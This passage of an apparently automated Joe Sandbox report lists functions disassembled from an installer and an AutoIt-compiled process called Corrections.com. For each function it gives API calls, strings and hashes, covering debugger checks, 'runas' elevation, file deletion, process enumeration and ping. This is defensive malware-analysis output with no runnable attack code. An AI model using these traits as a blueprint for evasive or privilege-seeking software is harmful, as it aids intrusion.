Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: Corrections.comPID: 5496, Parent PID: 6924COMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	61

Executed Functions

Function 00925FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00925FF7

Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A

GetCurrentProcess.KERNEL32(?,009BDC2C,00000000,?,?), ref: 00926123
IsWow64Process.KERNEL32(00000000,?,?), ref: 0092612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00926155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00926167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00926175
FreeLibrary.KERNEL32(00000000,?,?), ref: 0092617C
GetSystemInfo.KERNEL32(?,?,?), ref: 009261A1

Strings

GetNativeSystemInfo, xrefs: 00926161
kernel32.dll, xrefs: 00926150
|O, xrefs: 009650F7

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 1e8aaae47ed2cbadb5f3452cda5fb0c2b59faeb803adc575d50578f60a76b893
Instruction ID: f292c1605e85742f4b842f2010e973d284753b6ee93ba9f58eca6a087d7faa43
Opcode Fuzzy Hash: 1e8aaae47ed2cbadb5f3452cda5fb0c2b59faeb803adc575d50578f60a76b893
Instruction Fuzzy Hash: 54A1B2B296E3D4CFC716DB687C413B53FE86B26B00B094899E48097226D2FD5548FB32

Function 0092338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00923368,?), ref: 009233BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00923368,?), ref: 009233CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,009F2418,009F2400,?,?,?,?,?,?,00923368,?), ref: 0092343A

Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A

Part of subcall function 0092425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00923462,009F2418,?,?,?,?,?,?,?,00923368,?), ref: 009242A0

SetCurrentDirectoryW.KERNEL32(?,00000001,009F2418,?,?,?,?,?,?,?,00923368,?), ref: 009234BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00963CB0
SetCurrentDirectoryW.KERNEL32(?,009F2418,?,?,?,?,?,?,?,00923368,?), ref: 00963CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009E31F4,009F2418,?,?,?,?,?,?,?,00923368), ref: 00963D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00963D81

Part of subcall function 009234D3: GetSysColorBrush.USER32(0000000F), ref: 009234DE
Part of subcall function 009234D3: LoadCursorW.USER32(00000000,00007F00), ref: 009234ED
Part of subcall function 009234D3: LoadIconW.USER32(00000063), ref: 00923503
Part of subcall function 009234D3: LoadIconW.USER32(000000A4), ref: 00923515
Part of subcall function 009234D3: LoadIconW.USER32(000000A2), ref: 00923527
Part of subcall function 009234D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0092353F
Part of subcall function 009234D3: RegisterClassExW.USER32(?), ref: 00923590

Part of subcall function 009235B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009235E1
Part of subcall function 009235B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00923602
Part of subcall function 009235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00923368,?), ref: 00923616
Part of subcall function 009235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00923368,?), ref: 0092361F

Part of subcall function 0092396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00923A3C

Strings

AutoIt, xrefs: 00963CA5
runas, xrefs: 00963D75
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00963CAA

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: 11a1985ffa701bb15be895ffd41664c38282d3530244a00edd5103b15ebfda43
Instruction ID: df13bdfa31e120429eccba509bb3bd6b526c97d3b9b6ed2cbf93d78d4d0ae9f6
Opcode Fuzzy Hash: 11a1985ffa701bb15be895ffd41664c38282d3530244a00edd5103b15ebfda43
Instruction Fuzzy Hash: 4251247110C355AAC716FF70AC41FBE7BE8AFD0754F00492CF582521B6DB688A49E762

Function 0098DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00925851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009255D1,?,?,00964B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00925871

Part of subcall function 0098EAB0: GetFileAttributesW.KERNEL32(?,0098D840), ref: 0098EAB1

FindFirstFileW.KERNEL32(?,?), ref: 0098DCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 0098DD1B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 0098DD2C
FindClose.KERNEL32(00000000), ref: 0098DD43
FindClose.KERNEL32(00000000), ref: 0098DD4C

Strings

\*.*, xrefs: 0098DC9D

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: ae3ee49f52ef196e9892fe0ab718b079020bba99cb4717245b58c8bb97940a81
Instruction ID: 493eca2b982467bfc9c390bed4f7b2b71bead3b2dc854ed5723785684240ec37
Opcode Fuzzy Hash: ae3ee49f52ef196e9892fe0ab718b079020bba99cb4717245b58c8bb97940a81
Instruction Fuzzy Hash: 6F316B31009395ABC301FB60D9819EFB7ECAE95314F404E1DF4E5922D1EB20DA09DBA2

Function 0098DD87 Relevance: 6.1, APIs: 4, Instructions: 86
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0098DDAC
Process32FirstW.KERNEL32(00000000,?), ref: 0098DDBA
Process32NextW.KERNEL32(00000000,?), ref: 0098DDDA
CloseHandle.KERNEL32(00000000), ref: 0098DE87

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 25d9e7518be6ee835ea48cbf0f7270b40119449b349ab269122e92e8839c3d2b
Instruction ID: 4c4662dd3fd19f039bd6b1ed7e7b475f5e0fbccc4385b033e07b53aef4f62881
Opcode Fuzzy Hash: 25d9e7518be6ee835ea48cbf0f7270b40119449b349ab269122e92e8839c3d2b
Instruction Fuzzy Hash: D73184711083019FD314EF54DC85BAFBBE8AFD9354F04092DF585872A2EB71A949CB92

Function 0092EE56 Relevance: 21.6, APIs: 14, Instructions: 613windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0092EF07
timeGetTime.WINMM ref: 0092F107
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0092F228
TranslateMessage.USER32(?), ref: 0092F27B
DispatchMessageW.USER32(?), ref: 0092F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0092F29F
Sleep.KERNEL32(0000000A), ref: 0092F2B1

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: bb27342123d7f7421cfd21fdb5ce3ceca82e45725932d7ede376f90eb94d6cdb
Instruction ID: 88dcae5b276e955666096868ae3d51afda46120eb58d421e9a3bf4855e036d25
Opcode Fuzzy Hash: bb27342123d7f7421cfd21fdb5ce3ceca82e45725932d7ede376f90eb94d6cdb
Instruction Fuzzy Hash: 8E320371608212DFD728CF24D894FAAB7F8BF81304F14893DE569872A6D775E844DB82

Function 00923624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00923657
RegisterClassExW.USER32(00000030), ref: 00923681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00923692
InitCommonControlsEx.COMCTL32(?), ref: 009236AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009236BF
LoadIconW.USER32(000000A9), ref: 009236D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009236E4

Strings

AutoIt v3 GUI, xrefs: 00923673
+, xrefs: 00923640
0, xrefs: 00923639
TaskbarCreated, xrefs: 00923687

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 48b73e8156be6be0c4a46b45360787797c36c1c99528c9e7b2eb93cc8fb8c966
Instruction ID: 9b3d040062a20939fba74d15591b3ccead9f4f6f6676361406bdbac821152eb2
Opcode Fuzzy Hash: 48b73e8156be6be0c4a46b45360787797c36c1c99528c9e7b2eb93cc8fb8c966
Instruction Fuzzy Hash: C821EAB1D2A319AFDB00DF94E989BDD7BB4FB09710F10411AF511A72A0E7B54540DF50

Function 009609DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0096071A: CreateFileW.KERNEL32(00000000,00000000,?,00960A84,?,?,00000000,?,00960A84,00000000,0000000C), ref: 00960737

GetLastError.KERNEL32 ref: 00960AEF
__dosmaperr.LIBCMT ref: 00960AF6
GetFileType.KERNEL32(00000000), ref: 00960B02
GetLastError.KERNEL32 ref: 00960B0C
__dosmaperr.LIBCMT ref: 00960B15
CloseHandle.KERNEL32(00000000), ref: 00960B35
CloseHandle.KERNEL32(?), ref: 00960C7F
GetLastError.KERNEL32 ref: 00960CB1
__dosmaperr.LIBCMT ref: 00960CB8

Strings

H, xrefs: 00960C3D

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: cdb886edcd44b4b8b97803b0c11fe5d0f3fdd15824b23b6652addaae6a01a920
Instruction ID: 2d5893a7e2d32664f402512a847e7b0a37ccf086701b2ff258a2e7142ba64e9e
Opcode Fuzzy Hash: cdb886edcd44b4b8b97803b0c11fe5d0f3fdd15824b23b6652addaae6a01a920
Instruction Fuzzy Hash: 24A14632A241098FCF19EF78D892BAE3BA5EB8A324F140159F811DB3D2D7359C12CB51

Function 009252A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00925594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00964B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 009255B2

Part of subcall function 00925238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0092525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009253C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00964BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00964C3E
RegCloseKey.ADVAPI32(?), ref: 00964C80
_wcslen.LIBCMT ref: 00964CE7
_wcslen.LIBCMT ref: 00964CF6

Strings

Software\AutoIt v3\AutoIt, xrefs: 009253BA
\Include\, xrefs: 00925381
Include, xrefs: 00964BF4, 00964C35
\, xrefs: 00964CFC

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: ca8106e25e82e43b5ec9cb998006b9262427329abed469bb68892de2509cbd83
Instruction ID: 0b6673e4d1dd1fce157e4712b5b909e4d88f18eef74edc6f9baac1925f3e22b9
Opcode Fuzzy Hash: ca8106e25e82e43b5ec9cb998006b9262427329abed469bb68892de2509cbd83
Instruction Fuzzy Hash: 0771B1715193119FC314EF65EC81AABBBE8FF88350F80842EF145831B0EBB59A48DB91

Function 009234D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 009234DE
LoadCursorW.USER32(00000000,00007F00), ref: 009234ED
LoadIconW.USER32(00000063), ref: 00923503
LoadIconW.USER32(000000A4), ref: 00923515
LoadIconW.USER32(000000A2), ref: 00923527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0092353F
RegisterClassExW.USER32(?), ref: 00923590

Part of subcall function 00923624: GetSysColorBrush.USER32(0000000F), ref: 00923657
Part of subcall function 00923624: RegisterClassExW.USER32(00000030), ref: 00923681
Part of subcall function 00923624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00923692
Part of subcall function 00923624: InitCommonControlsEx.COMCTL32(?), ref: 009236AF
Part of subcall function 00923624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009236BF
Part of subcall function 00923624: LoadIconW.USER32(000000A9), ref: 009236D5
Part of subcall function 00923624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009236E4

Strings

0, xrefs: 0092355F
#, xrefs: 00923566
AutoIt v3, xrefs: 0092357F

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 41659295a73829983c2c815e1b48ff072e7fbfd703ba7c6eb9b230af50a8d47f
Instruction ID: 61aca8bea14ff380996e79c9f0fa3a189799bc4660955e0cdb2af27f737f0f5d
Opcode Fuzzy Hash: 41659295a73829983c2c815e1b48ff072e7fbfd703ba7c6eb9b230af50a8d47f
Instruction Fuzzy Hash: C62150B0D25315ABDB109FA5ED85BA97FF4FB08B50F00401AF604A62A0D7F94549EF90

Function 009A0FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 009A1019
inet_addr.WSOCK32(?), ref: 009A1079
gethostbyname.WS2_32(?), ref: 009A1085
IcmpCreateFile.IPHLPAPI ref: 009A1093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009A1123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009A1142
IcmpCloseHandle.IPHLPAPI(?), ref: 009A1216
WSACleanup.WSOCK32 ref: 009A121C

Strings

Ping, xrefs: 009A10D3

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
